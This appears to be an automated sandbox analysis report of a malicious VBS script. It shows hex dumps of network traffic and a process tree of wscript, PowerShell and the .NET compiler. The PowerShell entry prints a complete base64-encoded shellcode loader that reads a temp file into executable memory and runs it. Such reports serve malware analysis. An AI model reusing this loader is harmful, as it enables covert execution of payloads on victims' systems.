                      2022-01-13 13:55:07 UTC48INData Raw: 4c 0e 88 ec 53 39 b6 eb 7d ca f6 7e 09 24 ef 21 74 99 97 37 c9 ac 5f 4c 93 6b 24 71 3c 54 7c 4b 29 43 99 a6 22 17 c4 6e d5 60 77 2c fb b1 05 f4 7f 2f d3 6d 3a 5d 61 d7 b1 25 c9 ea 0b ac 3e 0a 92 e6 ae af 86 a7 95 23 c3 47 65 a3 7c c4 04 06 75 c7 62 15 0e a1 63 d8 78 29 b5 cd 70 5a be 2a 03 29 10 09 38 e9 65 8d df c7 e9 b2 39 cf 11 a6 c6 58 ba 16 61 5d 4e 16 7b 44 28 38 15 15 b3 0b d8 7c 88 a4 29 4f 4c 71 e0 50 91 39 1f f9 31 91 90 f0 1e 3a ed cb 21 6b ba e4 fa 82 82 23 f5 58 ed 83 d8 89 92 43 de d4 0f ef 8c 61 5d 13 5b 4c 60 92 99 41 2b 66 a6 d0 e2 e7 e3 f7 ae ce b5 4d dd c3 85 99 11 f0 92 a8 bd 31 88 5a a2 4c 9b ef b0 2e 33 42 24 60 ff ef c4 37 34 c0 86 e2 12 f1 3f 2d 09 7b 30 ba 4f 22 e7 cf c3 dd 36 6f b4 c0 34 44 0f 84 73 c9 d6 b2 2e 07 b3 c3 68 98 bf
                      Data Ascii: LS9}~$!t7_Lk$q<T|K)C"n`w,/m:]a%>#Ge|ubcx)pZ*)8e9Xa]N{D(8|)OLqP91:!k#XCa][L`A+fM1ZL.3B$`74?-{0O"6o4Ds.h
                      2022-01-13 13:55:07 UTC64INData Raw: d6 44 7e 0c f9 35 4f 57 a3 94 1f 3a c2 a0 1c 23 8c 6b 0a d9 ab 19 53 36 dc 16 4a 01 d7 7f 36 e1 d4 37 5b f1 35 7f 6a 8e 85 c2 b6 04 cd c4 c4 42 41 52 c7 5e 51 48 63 a1 84 a6 35 11 42 40 04 f6 d9 c4 a6 15 57 2f 99 43 83 13 ed f1 ba e6 b6 b9 61 0b 4c 71 41 c8 86 01 f4 ec 53 2c c1 e8 ce ef 7f 54 2e ee 35 0a 56 c4 b2 3d 22 17 75 77 55 db 30 13 ab 72 45 74 8b e5 bb 8c 35 e3 9f 6e 7f 25 8b 75 23 8d 63 35 87 07 af ad af 95 cb be ad 25 3b 62 22 46 f5 f9 2b 97 ad 24 a3 7a 4e 49 89 a4 87 72 e4 f2 11 4f 90 ac 69 57 5a d2 cf 03 96 9a 29 9a ac 59 e3 3c 19 29 1a 8b 64 28 f0 2f 01 d7 c0 b3 a8 c8 5b 52 8c 1d 90 ac 02 51 f4 e8 d2 37 d2 39 3b fc fe f5 37 c6 fc 17 0c a0 af 61 fa 23 ea 7e 37 0e 89 b2 5f 13 f9 23 0f 1a 3f 74 8c 93 75 e6 8d 5a c4 cd a5 62 d5 ad ae 6c 4c 1a ad
                      Data Ascii: D~5OW:#kS6J67[5jBAR^QHc5B@W/CaLqAS,T.5V="uwU0rEt5n%u#c5%;b"F+$zNIrOiWZ)Y<)d(/[RQ79;7a#~7_#?tuZblL
                      2022-01-13 13:55:08 UTC80INData Raw: c7 da 2d 67 b1 26 f5 bd 20 b5 f9 ea 80 70 c6 f2 2e 82 2f db 21 76 cc 94 7f 06 bb 4d d8 89 36 dd 51 c2 68 db ab 24 36 31 4f 7d 18 e9 0b 64 b2 bb be ad e6 66 65 9a b6 9c 6b 12 be 46 18 75 e5 18 81 92 e5 c7 a2 ce 51 b2 6c 1f e3 52 a5 2f dd e3 dc 2c a9 ea 72 1a 2c ec 07 79 f4 71 50 90 a2 1e 4b 95 1f ee ea 86 96 ac 98 d1 fa b5 b2 01 6d 7a f2 64 1e 69 24 7b 35 ca fc 32 48 20 8c 8a e8 4c ce 16 07 80 4e be f3 88 ee c6 df 3d a9 29 51 7d 70 00 2a d8 c5 f5 af 13 f8 d3 43 21 cf 1c f8 97 00 e0 9d 65 bd b8 80 df 44 f3 a5 62 a4 4f fd b7 17 8c c9 4f f3 be 00 35 8a 33 cc 83 69 00 23 b4 3b c6 76 07 4f 89 1f 6c a7 4c ff 1e f4 72 0f c0 b0 1e bf 0f 69 2b fa 8f 3d fd 37 9e 74 f2 29 94 3e f4 30 37 36 76 ca d9 22 76 e7 a9 9e 34 04 d5 0a 74 b0 21 14 8f c3 77 2f bb 87 aa 89 2e db
                      Data Ascii: -g& p./!vM6Qh$61O}dfekFuQlR/,r,yqPKmzdi${52H LN=)Q}p*C!eDbOO53i#;vOlLri+=7t)>076v"v4t!w/.
                      2022-01-13 13:55:08 UTC96INData Raw: af ed 67 8f 7c 1c 81 af 9c fe 18 64 94 00 3f d8 8c e3 42 de 0d f2 a1 cc c3 e1 87 5b 3a ef 6e 23 a6 92 4c 59 a4 32 9a 6a 78 52 b4 ed 86 1d 0f 6d d5 3a 8c 10 df 2b 9a 18 c8 a2 26 8f e1 83 e6 c0 bd db 31 7d 2f 7b 45 64 28 ee a2 e6 74 4b 14 9f 9a a7 74 5b ca 43 38 86 d0 1d af dc 91 d3 93 ba 1f 8b 35 7b 1e bf ab 6b 1b 95 67 3c b0 23 18 4c 81 45 af 63 ff 00 d8 ef 15 7b 2f c4 fa 2f 07 20 9b db 70 ff 04 6f ea 58 b2 13 4a 24 91 b3 a6 9f ad a3 f4 b6 04 98 69 b4 0d 2b 2f 00 88 fc 5b ac a2 7a 26 4a 2c ec 48 9b bd 98 88 8b af 71 5a c1 65 4d ec e9 64 70 d1 bf a4 6e 3d 4d ca 79 26 85 97 b7 bc d3 d2 f3 45 03 14 83 f0 80 c3 0b 01 4b c4 2f c1 b0 a7 e0 c0 09 ab 05 0d 82 e9 10 36 57 d8 58 2e 4e 23 cb 74 2b 31 83 0d 99 0d 11 e4 13 90 5e 05 23 2c f3 88 c4 0e 50 a0 c4 5d b8 c4
                      Data Ascii: g|d?B[:n#LY2jxRm:+&1}/{Ed(tKt[C85{kg<#LEc{// poXJ$i+/[z&J,HqZeMdpn=My&EK/6WX.N#t+1^#,P]
                      2022-01-13 13:55:08 UTC112INData Raw: a9 8f f9 d4 9f a8 1e f5 c4 b6 4b 77 5b f3 7c 48 01 65 76 9c a3 62 7c 96 45 57 54 07 30 52 92 c2 57 e3 35 cf af 99 95 48 df 59 87 d8 55 99 b8 dc 1a 6d af 22 b2 28 bc 0c ef b6 63 22 37 d2 21 e1 54 d1 6c 57 64 4b 92 d6 ae 50 c8 ed 10 45 7e 9d 85 c6 2b 88 28 59 82 00 8f 2d 2c 7c 3b b6 f8 36 07 10 7f 96 0b 2a be 66 99 6e e7 b8 a9 ea 15 1b fa b8 2a 1f d8 e1 20 c6 53 a1 ef 3c 34 70 af a0 a4 86 ce 4e ed e0 74 ed 3e d0 cf 50 c0 6e 04 c0 ed 2b d7 7c 50 c9 2b a6 05 7f ad 66 53 10 d6 32 d6 b3 e2 df b4 dd b6 2b cf 2f 8a 9b 26 6c d5 70 e4 31 49 33 7a ad 36 f2 2e 29 01 0f 0c 54 e1 f7 11 a1 a2 24 bf b7 a1 b6 58 08 f4 e8 b1 4a 0c a0 3c d6 04 59 be 71 73 3b 9c fa df 9b 73 1d dd e2 5f 80 c6 f0 52 bc 88 dc f7 68 bf 54 33 f6 11 07 b7 91 e8 cc 21 56 d3 e3 32 b8 08 b6 b0 38 10
                      Data Ascii: Kw[|Hevb|EWT0RW5HYUm"(c"7!TlWdKPE~+(Y-,|;6*fn* S<4pNt>Pn+|P+fS2+/&lp1I3z6.)T$XJ<Yqs;s_RhT3!V28
                      2022-01-13 13:55:08 UTC128INData Raw: b8 93 ba 7f b0 24 6a 2b 32 c8 e4 5d 74 2f 01 a8 d5 cc 65 05 14 5f 62 82 78 89 3d b4 13 c1 90 fa b0 c6 94 db 72 82 34 57 d0 05 01 b8 07 db 73 23 23 55 a0 d0 66 45 29 90 3d ec 2d 81 e4 8c 80 f9 3e c8 cb a8 a9 af 57 4d 70 70 ef 41 2c c0 ec a4 41 c7 e2 ff b5 2f d1 6c c2 84 3c d8 bf 91 8c 93 23 bf 57 de 41 26 70 6c 79 39 df 2e 4a 3e 30 47 72 a0 62 d5 75 e0 6c 7f 0f e5 d1 3a a3 ee e8 d4 34 53 0e db f2 00 32 60 4c 65 31 6e d4 e2 84 9f 95 f9 5b 64 81 f8 74 82 a7 d1 75 fe ea 07 28 16 3c 4b bd 6f eb 23 08 6a 25 f7 57 54 73 f4 2c 39 67 39 ea ef 58 9a fd f4 c4 2e 7a 9b 43 24 ff c7 93 47 a5 42 29 60 5f ae 35 5e d6 8b 55 52 c0 24 91 ae 47 e5 b2 95 7e c4 6e f2 ba 26 2f 82 95 58 b8 40 57 c8 36 23 27 9c bf 3d 5e cd aa d5 f9 ec 70 55 52 67 e2 9b ba 99 fd dc fd be c4 c9 bb
                      Data Ascii: $j+2]t/e_bx=r4Ws##UfE)=->WMppA,A/l<#WA&ply9.J>0Grbul:4S2`Le1n[dtu(<Ko#j%WTs,9g9X.zC$GB)`_5^UR$G~n&/X@W6#'=^pURg
                      2022-01-13 13:55:08 UTC144INData Raw: 36 64 6a ac 7c 66 4f 17 03 97 0c b3 1b 95 ff ca 25 d0 ae 18 41 7c c2 47 23 9f 48 f6 ec 0c 0f 77 a4 fc df 51 17 2a ed fd d4 2b d7 aa 09 2e ca 72 f8 e0 52 7c bc b9 3e ed d8 25 87 8f fa b2 9c 05 1a 3a c7 ec 90 71 56 4e e7 02 28 99 e0 e7 ea 64 08 b3 56 06 6b a2 d0 d2 1e 4f 24 81 b0 41 e8 fc 18 10 50 72 52 8e af 2e 0f 6b db 55 df b1 26 c2 4a ff 99 fe 79 2e 17 14 de dd 68 e9 33 6a c9 e7 8c 24 7f 9b e2 ca 1e 6a 4e 75 ca 69 d5 55 c1 45 d7 78 1f 20 1f fc c3 f4 b1 64 f7 98 09 f3 64 80 d9 6e 8e 2a 88 c0 24 16 44 ac 28 20 ea 9b 69 7d 33 1e 50 3f b4 d3 55 d2 93 77 21 60 c6 d1 4b 06 06 cf fe ba 23 32 32 1b da b5 d2 cc a1 2e 5c e5 78 9c 6a 8c 68 75 d2 ee c5 cf 4c 38 f4 28 69 c7 33 a9 59 39 47 d2 c2 63 b8 48 03 78 1a 77 a6 92 d2 bb 08 ec 60 7a ef 5e c7 a6 90 c9 9a f0 8e
                      Data Ascii: 6dj|fO%A|G#HwQ*+.rR|>%:qVN(dVkO$APrR.kU&Jy.h3j$jNuiUEx ddn*$D( i}3P?Uw!`K#22.\xjhuL8(i3Y9GcHxw`z^
                      2022-01-13 13:55:08 UTC160INData Raw: 7d 47 1f 4c ab f9 a3 db 35 53 d7 5c 0f 47 ac 58 73 6d 08 38 0a c4 d4 5e 9c 17 9f 5b 44 2f ae e7 b3 41 e2 73 2f 9f db 43 1a 7a 50 25 6b 4b 0c 30 77 a6 37 5b 1c 54 12 93 54 12 9a 0e 28 51 c3 fb f8 81 22 69 30 3b 50 9d 2a 2d 15 54 09 9c 2b cb 4d 1b dd 25 e5 6d e6 12 67 b2 df 55 c2 19 24 01 af c3 dc 57 1d 20 11 bc ca 9b 30 2c d3 04 a9 e2 e0 e6 e3 1c 24 7c 1a db 88 94 89 5d 68 b2 62 33 aa f4 0f df c6 16 1f 71 56 c4 49 2f 4b 5b b6 4a 20 e5 98 c3 6f 1b 3a f7 a4 bb 38 5a 40 c4 89 74 52 23 43 f6 2d 29 6d 7f 78 a6 57 9e f9 97 0a a1 20 88 f0 33 3f 81 d6 2a 72 1a 30 63 26 2c 54 14 d8 e8 54 b8 c9 8a cc c1 33 e8 78 b3 28 98 79 34 d8 d1 39 66 80 dc 44 a6 b5 ef ea bc 6b 86 cf 48 b5 a8 14 47 64 5a 3e 39 c1 cb 0f 51 06 c0 87 c4 fb be fd c9 3a 28 f4 72 3a bb d0 a2 e1 22 56
                      Data Ascii: }GL5S\GXsm8^[D/As/CzP%kK0w7[TT(Q"i0;P*-T+M%mgU$W 0,$|]hb3qVI/K[J o:8Z@tR#C-)mxW 3?*r0c&,TT3x(y49fDkHGdZ>9Q:(r:"V
                      2022-01-13 13:55:08 UTC176INData Raw: 66 97 fc 5c fd 9b 8c 82 88 ba 99 b5 4d 87 13 6c 74 08 75 51 bc 5d 88 b3 27 5b 2b 44 5f ac b2 3c b9 c0 3c 43 2d b6 58 fe 3b 6d 39 54 66 6b 13 43 05 b2 b0 67 7d a4 2c ce a4 59 02 3c 8a e4 05 ea 50 b2 2d 53 96 36 04 84 5b d0 a7 f7 31 c8 2e 25 85 de 78 eb da 9c 4e 1d 90 0d e1 ca 8a d8 53 37 8b 6a 79 0d 05 f4 20 aa 76 4f 8a 3a 9e 14 a3 db d5 d2 b4 26 61 d0 4c 62 9a 92 73 74 0a 2b 4c d4 fc 7e 0d 3a ea de 40 1a c3 db b5 57 99 83 fc 1e ba c4 27 32 94 80 c4 44 f4 2b 89 c6 29 ee 83 40 ec de a8 f0 03 c7 c0 bd b2 35 68 da 1c a9 b7 53 52 e7 3b e1 1f ad 14 b0 06 97 86 aa 1a 30 24 6f ca 95 3f 86 00 19 bd 5e a2 fb f5 ee f5 d1 0f 27 27 79 1f ed a7 42 e6 3d 9c e5 17 29 5c 4a 0d ea 77 c3 8b 2c 30 0b 72 5f 19 fa 87 8a a8 2b 56 72 c5 2b 26 79 25 fd 34 7f ae 43 5d 49 db 8d 51
                      Data Ascii: f\MltuQ]'[+D_<<C-X;m9TfkCg},Y<P-S6[1.%xNS7jy vO:&aLbst+L~:@W'2D+)@5hSR;0$o?^''yB=)\Jw,0r_+Vr+&y%4C]IQ


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: wscript.exe PID: 7072 Parent PID: 3440

                      General

                      Start time:14:53:50
                      Start date:13/01/2022
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
                      Imagebase:0x7ff61a070000
                      File size:163840 bytes
                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: powershell.exe PID: 6420 Parent PID: 7072

                      General

                      Start time:14:53:58
                      Start date:13/01/2022
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwAzACwAMAAsAFsAcgBlAGYAXQAkAGIAaQBkAHIAYQBnAHMAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAFMAbwBjAGkAYQBsAGQAZQBtADcAIABTAEMAQQBMAEQAIABCAG8AZwBnAGwAZQBzACAAcwBpAGsAaAAgAE8AbABpAHMAawBlACAAUwBqAHUAcwBrAGUAbQBhAGwANgAgAGkAbgB2AGUAcwB0AG0AIABFAGwAaQB0ADkAIABNAFUATABUAEkARgBBAEMAVABPACAARgByAHUAZwBhAGwAIABCAHIAbgBlAHAAcwB5ACAARQB4AHAAcgBlAHMAcwAgAEYAcgBkAGUAIABDAE8AUgBSAE8ARABFAFIAIABGAFIATwBOAFQAIABmAGkAdAB0AGkAbAB5AHMAawBlACAARQBwAGkAcABsACAAUAB1AHIAdgBlAHkAIABtAHUAbgBkAHMAawAgAFMAdAB1AGQAZQA0ACAAcwBlAGwAcwBrAGEAIABrAG8AbQBwACAAawBiAGUAcwB1AG0AcwBhAG4AIABBAHUAdABvAHQAbwBtAGkAYwBmACAAVABSAEEASQAgAGwAYQBuAGMAZQB3ACAAVAByAGEAbgBzACAAQgBpAG8AcgB5AHQAbQBlACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAGEAbgBlAGIAZQByAHIAaQBlADIAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwARgBPAFIAUwBWAEEAUgBMAC4AZABhAHQAIgANAAoAIwBCAFIAQQBUAFMAQwBIAEUAUgAgAFAAcgBzAHQAIABGAG8AcgBtAHUAbABlAHIAZQAzACAATgBhAHMAbwBwAGgAYQByAHkAbgAgAE0AbwBuAHQAZwAgAEMATwBOAFQAUgBBAEwAVAAgAE4ATwBOAEMAQQBQAEkATAAgAFYAaQBjAHQAbwByAGkAYQBuADMAIABCAFIATgBEAEUAVgBJAE4AUwAgAE0AeQB6AG8AZAAgAEIAdQBzAGgAZwBhAHMAdABlAHIAIABmAGkAcwBzAHUAcgBlACAAVwBoAGUAcgBlAGUAOQAgAGYAaQBlAGwAZABtAGEAbgAgAEMAbwBsAGEAdQB4AGUAdAAyACAARQBsAHUAYwAyACAAZQBsAG8AaQBnAG4AaQBuAGcAZQAgAFMAdgByAHQAZQBuAGQAZQAgAGgAZQBtAG0AZQBsACAAVABBAEwARQBPACAAUgBrAGUAYgBpACAAUwBUAEoAWQBMAEwAQQBOAEQAUwAgAEsAcgB5AHMAdABhAGwAIABsAGkAZwBlAHMAawBlACAAUwBhAG0AbQBlAG4ANgAgAFQAcgBpAGcAZwA0ACAAcABzAHkAawBvAHQAZQBrACAAQwBPAE0ARQBEAE8AIABlAHUAbABvAGcAaQBjAGEAbAAgAE0AYQByAGsAIAANAAoAJABiAGkAZAByAGEAZwBzADQAPQBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAGIAaQBkAHIAYQBnAHMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBDAG8AYwBvAG8AbgBlAGQANgAgAFYAaQBhAHQAaQBjAGEAZABlACAAaQB0AGUAcgBhAHQAaQB2AGIAIABhAHYAaQBzACAASwByAGUAbAByAGUAcgBlAGYAIABvAGIAagBlAGsAdABrAG8AZAAgAHQAYQBsAGkAdABlACAAawBpAGoAZQAgAE0AYQBjAHIANgAgAEcAdQBpAGwAbABvAHQAIABQAFIARQBEAE8AUABTACAAUwB1AGMAYwB1AG0AYgBpAG4ANQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAbwB2AGUAcgBjAG8AbgAiACAADQAKACQAYgBpAGQAcgBhAGcAcwA1AD0AMAA7AA0ACgAjAFcAZQBkAGcAZQB0AGEAaQBsACAAUgBhAHQAaQA2ACAATgBvAHQAYQB0AGUAcwBkAHIAaQAgAE4ATwBOAEgASQBFAFIAIABGAGkAbABlAHQAIABzAHQAaQBmAGYAIABSAGUAYwBhADgAIABGAGwAdQBiAGsAbwBlACAARQBsAGUAYwB0AHIANQAgAEkAbgBkAGUAcwB0AGEAYQBlAG4AIABSAG8AYgBoAGEAaABiAGkAZAByADEAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwByAGQAYgByAHUAZwBlAHQAIgAgAA0ACgBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAGIAaQBkAHIAYQBnAHMANAAsACQAYgBpAGQAcgBhAGcAcwAzACwAMgA2ADcAMQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwA1ACwAMAApAA0ACgAjAGMAYQByAGIAbwAgAGoAYQBwAG8AIABtAGkAcwBmACAATQBhAGYAZQA5ACAAawBvAG0AbQB1AG4AZQBzAGYAaQAgAFcAYQByAHIAZQBkAGQAZQBsADEAIABhAGMAZQB0ACAAQwBvAGEAcwB0ADIAIABzAHQAYQB0AHUAIABJAG0AcABlAGQAMgAgAEwAaQB0AHQAZQByADMAIABzAGMAaQByAHIAaABvAHUAcwBzACAAVwBhAGkAawBsAHkAYwBvAHUAMwAgAG4AZQBwAGUAbgB0AGgAIAB0AG8AcgBtACAATABnAGUAcwB0AHUAZABlAHIAIABEAGUAcABvAG4AZQByADYAIABBAEsAVABJAFYAUwBUAE8ARgAgAFMAbABlAGUAIABVAG4AaQBuAHQAcgAgAFIAYQBkAGkAbwBhAHMAdAAgAEEAZgB2AGEAbgBkAHIAZQAyACAAcwBhAGQAZQBsAHQAYQBzACAATABPAFYATwAgAEIAZQBkAHUAIABnAGwAbwBzAHQAcgB1AHAAIABNAEEAQwBVAFMASABMAEEAUQAgAFUAbgB0AHIAbwB0ADcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBzAGcAZQBuADkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAHQAZQBsAGwAaQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAeQBzAHQAZQBtAGYAdQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEEAVABFAFIAUABJAFQASgBPACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATgBHAFMATABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBhAGwAbABhACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbgBkAGUAcgAyACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHMAcAByAHUAaQBrAGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQwBhAHAAdABpAHYAZQBzAGcAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBtAGEAdABoAGkAYQBzAGUAbgBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMASQBHAEkATABMACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE8AUABIAEkATwBMAEEAVABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdAByAG4AaQBuAGcAcwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBFAHYAYQBjAHUAYQB0ACIAIAANAAoAWwBiAGkAZAByAGEAZwBzADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAGIAaQBkAHIAYQBnAHMAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoA
                      Imagebase:0xd30000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 6452 Parent PID: 6420

                      General

                      Start time:14:53:58
                      Start date:13/01/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff61de10000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: csc.exe PID: 6840 Parent PID: 6420

                      General

                      Start time:14:54:29
                      Start date:13/01/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
                      Imagebase:0x1140000
                      File size:2170976 bytes
                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: cvtres.exe PID: 6920 Parent PID: 6840

                      General

                      Start time:14:54:31
                      Start date:13/01/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
                      Imagebase:0x1040000
                      File size:43176 bytes
